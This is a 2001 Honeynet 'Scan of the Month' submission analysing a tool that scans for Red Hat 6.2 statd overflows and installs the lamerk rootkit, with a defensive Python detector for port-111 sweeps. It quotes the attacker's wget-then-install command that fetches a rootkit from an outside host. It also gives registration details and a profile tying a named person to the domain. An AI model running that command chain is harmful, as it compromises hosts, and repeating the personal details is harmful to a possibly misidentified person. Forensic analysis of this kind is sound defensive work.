From kkenda11@yahoo.com Fri Mar 23 10:14:46 2001
Date: Wed, 21 Mar 2001 16:00:39 -0800 (PST)
From: Kris Kendall
Reply-To: kkenda11@pacbell.net
To: project@honeynet.org
Subject: Scan of the Month -- March

From: Kris Kendall (kendalk@ogn.af.mil) and Jesse Kornblum (kornblj@ogn.af.mil)
US Air Force Office of Special Investigations

1. What is the blackhat attempting to do with his command line syntax?

The blackhat is attempting to scan and attack several IP ranges for the vulnerabilities described in (2) below. A lookup for who has registered each of these IP blocks can be found here: http://ipindex.dragonstar.net/index.html. The networks being scanned are: 216.210.x.x, 200.120.x.x, 64.120.x.x, 216.200.x.x, 200.120.x.x, 63.1.x.x, 216.10.x.x, 210.120.x.x, 64.1.x.x, 216.1.x.x, 194.1.x.x, 216.1.x.x, 210.128.x.x, 24.1.x.x, and 12.20.x.x.

2. What does the tool accomplish?

The tool scans for Redhat Linux 6.2 boxes that are vulnerable to the statd buffer overflow, and exploits the vulnerability to install a rootkit on these vulnerable hosts.

3. How does the tool work?

The blackhat starts the process by invoking "luckgo [ ]". The blackhat can specify a class A, B, or C network to scan. luckgo is a shell (/bin/sh) script. If luckscan-a and luckstatdx do not exist yet, luckgo attempts to compile them. luckgo then creates scan.log (if it doesn't exist) and calls luckscan-a to do the scanning. It is interesting to note that although scan.log is created by luckgo, it is never written to. Perhaps this was a coding error on the part of whoever wrote the luckgo script.

luckscan-a attempts to open connections to port 111 on all hosts (1000 at a time) in the network being scanned. For each successful connection luckscan calls luckstatdx to attempt the statd buffer overflow on that host. luckstatdx is called with the parameters "-d 0 ". The "-d 0" part of this parameter list tells the statd exploit to use the exploit code for "Redhat 6.2 (nfs-utils-0.1.6.2)". So, this tool targets Redhat 6.2 victims.

If the buffer overflow is successful in spawning a root shell, the following commands are executed on the victim host:

    cd /
    uname -a
    id
    wget -nd http://www.becys.org/xzibit.tar.gz
    tar -zxvf xzibit.tar.gz; cd lamerk
    ./install
    cd /
    rm -rf lamerk xzibit.tar.gz

These commands retrieve a rootkit from the attacker's web site and install it. The rootkit installs trojanized versions of ifconfig, netstat, ps, and top. The configuration files for the rootkit are installed in "/dev/caca", "/dev/dsx", and "/dev/ida/.inet". It also installs LinSniffer, a packet sniffer that listens to eth0 looking for passwords, writing output to a file tcp.log. The rootkit then adds the sniffer to the system startup files and installs two backdoors: one for SSH access on port 6969, the other a cgi program that allows remote users to execute commands on the system. The md5 hash of the backdoor password for sshdu is probably: f35ccf7b5f691399495d84eadd656df7. This hash does not match any word from /usr/dict/words. The install script then sends e-mail to becys@becys.org containing the IP addresses, hostname and "uname -a" output for the newly rooted box.

4. Is this tool a worm, or would you classify it as something else?

This is not a worm, as it does not have any power to self-replicate. Rather, the tool is a scanner that installs a rootkit on every vulnerable host it encounters. The rootkit sniffs traffic looking for passwords and opens multiple backdoors for the attacker (and other users) to access the system.

5. Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified?

This tool is composed of slightly modified versions of previous tools. The exploit tool is based on the statdx.c exploit originally written by ron1n (shellcode@hotmail.com), dated August 3, 2000 and posted to Bugtraq on August 5, 2000 [2]. The original statdx.c, available at [1], has been modified such that when a vulnerable host is found, the program installs a rootkit on the vulnerable host as described in (3) above. The scanner (luckscan-a.c) is based on pscan-a.c, a privately released port scanner by Volatile. A copy of the C code for the original pscan-a can be found at [3]. The lamerk rootkit installed on the victims is similar to many other linux rootkits. The configuration files have the same format as the configuration files for lrk, t0rnkit, and Ambient's Rootkit for Linux (ARK) [4].

Bonus Question: What information can you obtain about who is using or created the tool?

The tool mentions the e-mail address becys@becys.org and also retrieves the rootkit from this domain. The domain becys.org was registered via Bulkregister.com Inc on September 11th, 2000. The domain is registered to bSoft, 1 Hensel Dr. Apt #Z1F, College Station, TX, 77840 USA. The administrative contact is listed as Qian Wang, becys@yahoo.com, at the same address, phone 979-862-9233. Because DNS registration information can easily be falsified, the above should be taken with a grain of salt. The becys@becys.org e-mail is handled by host3.websitesource.com. This domain is registered to WebSiteSource Inc based in Houston, TX. The Yahoo! profile for becys, which again is trivial to falsify, says that becys' real name is Dimitru Liviu Mihai from Targoviste, age 18, a single male student. His favorite hobby, latest news, and favorite quote are all listed as "sex". Targoviste is a city in Romania.

References:

1. http://packetstorm.securify.com/0008-exploits/statdx.c
2. http://archives.neohapsis.com/archives/bugtraq/2000-08/0013.html
3. http://www.self-evident.com/security/scanners/pscan-a.c.gz
4. http://packetstorm.securify.com/UNIX/penetration/rootkits/
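A defender-side check built from the scanning behaviour described in (3): luckscan-a touches TCP port 111 on every host of a network in large bursts, so one source reaching port 111 on many distinct hosts inside a short window is the signature to alert on. This is an added example, not code from this submission or from the tool itself; the log format, the source addresses and the thresholds are constructed for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log, one line per SYN seen at the perimeter:
# "<ISO timestamp> <src_ip> -> <dst_ip>:<dst_port> SYN"
SAMPLE_LOG = """\
2001-03-01T02:10:00 10.9.9.9 -> 216.210.0.1:111 SYN
2001-03-01T02:10:00 10.9.9.9 -> 216.210.0.2:111 SYN
2001-03-01T02:10:00 10.9.9.9 -> 216.210.0.3:111 SYN
2001-03-01T02:10:01 10.9.9.9 -> 216.210.0.4:111 SYN
2001-03-01T02:10:01 10.9.9.9 -> 216.210.0.5:111 SYN
2001-03-01T02:10:02 10.9.9.9 -> 216.210.0.6:111 SYN
2001-03-01T02:10:05 10.1.1.1 -> 216.210.0.7:111 SYN
2001-03-01T02:11:00 10.1.1.1 -> 216.210.0.8:22 SYN
2001-03-01T03:30:00 10.9.9.9 -> 216.210.0.1:111 SYN
"""


def parse_line(line):
    """Split one constructed log line into (timestamp, src, dst, dport)."""
    ts, src, _arrow, dst_port, _flag = line.split()
    dst, port = dst_port.rsplit(":", 1)
    return datetime.fromisoformat(ts), src, dst, int(port)


def find_sweeps(log_text, port=111, min_hosts=5, window=timedelta(seconds=60)):
    """Return {src: peak_distinct_hosts} for every source that reached
    `port` on at least `min_hosts` distinct hosts inside some `window`.
    Re-probing the same host does not raise the count, and a lone probe
    long after the burst falls outside the window."""
    by_src = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            ts, src, dst, dport = parse_line(line)
            if dport == port:
                by_src[src].append((ts, dst))
    hits = {}
    for src, events in by_src.items():
        events.sort()
        peak, start = 0, 0
        for end in range(len(events)):
            # slide the window start forward until the span fits in `window`
            while events[end][0] - events[start][0] > window:
                start += 1
            peak = max(peak, len({dst for _, dst in events[start:end + 1]}))
        if peak >= min_hosts:
            hits[src] = peak
    return hits
```

On the constructed log only 10.9.9.9 is flagged (six distinct hosts in two seconds); the single port-111 probe from 10.1.1.1 and the later repeat of 216.210.0.1 do not qualify.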